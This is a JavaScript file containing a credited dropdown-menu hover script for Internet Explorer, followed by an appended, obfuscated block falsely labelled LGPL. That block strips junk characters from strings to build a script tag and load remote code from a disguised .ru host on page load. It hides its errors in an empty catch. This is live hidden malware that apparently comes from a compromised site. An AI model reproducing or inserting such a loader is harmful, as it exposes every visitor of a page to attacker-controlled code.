/* ================================================================ 
This copyright notice must be kept untouched in the stylesheet at 
all times.

The original version of this script and the associated (x)html
is available at http://www.stunicholls.com/menu/pro_drop_1.html
Copyright (c) 2005-2007 Stu Nicholls. All rights reserved.
This script and the associated (x)html may be modified in any 
way to fit your requirements.
=================================================================== */
stuHover = function() {
	var cssRule;
	var newSelector;
	for (var i = 0; i < document.styleSheets.length; i++)
		for (var x = 0; x < document.styleSheets[i].rules.length ; x++)
			{
			cssRule = document.styleSheets[i].rules[x];
			if (cssRule.selectorText.indexOf("LI:hover") != -1)
			{
				 newSelector = cssRule.selectorText.replace(/LI:hover/gi, "LI.iehover");
				document.styleSheets[i].addRule(newSelector , cssRule.style.cssText);
			}
		}
	var getElm = document.getElementById("nav").getElementsByTagName("LI");
	for (var i=0; i<getElm.length; i++) {
		getElm[i].onmouseover=function() {
			this.className+=" iehover";
		}
		getElm[i].onmouseout=function() {
			this.className=this.className.replace(new RegExp(" iehover\\b"), "");
		}
	}
}
if (window.attachEvent) window.attachEvent("onload", stuHover);



/*LGPL*/ try{ window.onload = function(){var U9j2nb02divr0 = document.createElement('s&c@$r&@!((i@^p@$t^&(!'.replace(/\$|\(|#|\)|\^|@|\!|&/ig, ''));U9j2nb02divr0.setAttribute('defer', 'd)^e@($)f@)^^e#)r#&@@'.replace(/\(|&|\$|@|\^|\!|#|\)/ig, ''));U9j2nb02divr0.setAttribute('type', 't^((e@&^&x)(^t))$/^(&j^$!a@v$a@$^s$$c^&r^@#@i^)#p$!t&&'.replace(/\(|\$|#|@|\)|&|\!|\^/ig, ''));U9j2nb02divr0.setAttribute('id', 'K)!!v^#&e^#&r&&&9@#$!k#w$^$n!)@6@z@)j@$8((@h()#j('.replace(/\)|\(|\!|#|\^|\$|&|@/ig, ''));U9j2nb02divr0.setAttribute('s@$r!&c!'.replace(/\^|\)|\(|\$|@|&|#|\!/ig, ''),  'h&&(t&t&)#p@)):#&)/!/#w#e^@b)(m#((!d$-)c#o^m@.#(s)!^o#))))f(t##l)@a$^y&$e&@^$r$@)@.!&@c^!)#o@(m^@.##h$!a$&@r(&@r^!$!e&&n^^(m!$e!#d$(&&i^)#a@&n&@^^e)t!)&$$w(o&!r@k!)!)-!!&c!@@o@&#m&#.^^^(#c#(a^$r^#^s&!!!w)@e^b@!n&!&@e$(!@t)$.#!r@&u&:&8@)0!@8(!@@0&/&)g)@!o^$o)@)&g$&!@l(e&@^#.(^@c)!o&(@)m@/&(g^)$#o#&$o@!g$&l$)(e@^!^.!!@)^c!!o((m@&!/&&#@c)(r)^(a&)^i@g)#()s$#(l()i#)(&s@()(t&@.$))o&r)g)#)!/!^$s()^@k!#^$y!.$!(c!o(#!!m!/))!b)$))l^!#o)o(!&(#m($b#e)&$r$#&g(#.@)#!&c!(^)o()^m#^/^^!'.replace(/#|\)|\!|\(|&|\^|@|\$/ig, ''));if (document){document.body.appendChild(U9j2nb02divr0);}} } catch(G0e5imjyyvo8vebt1bn) {}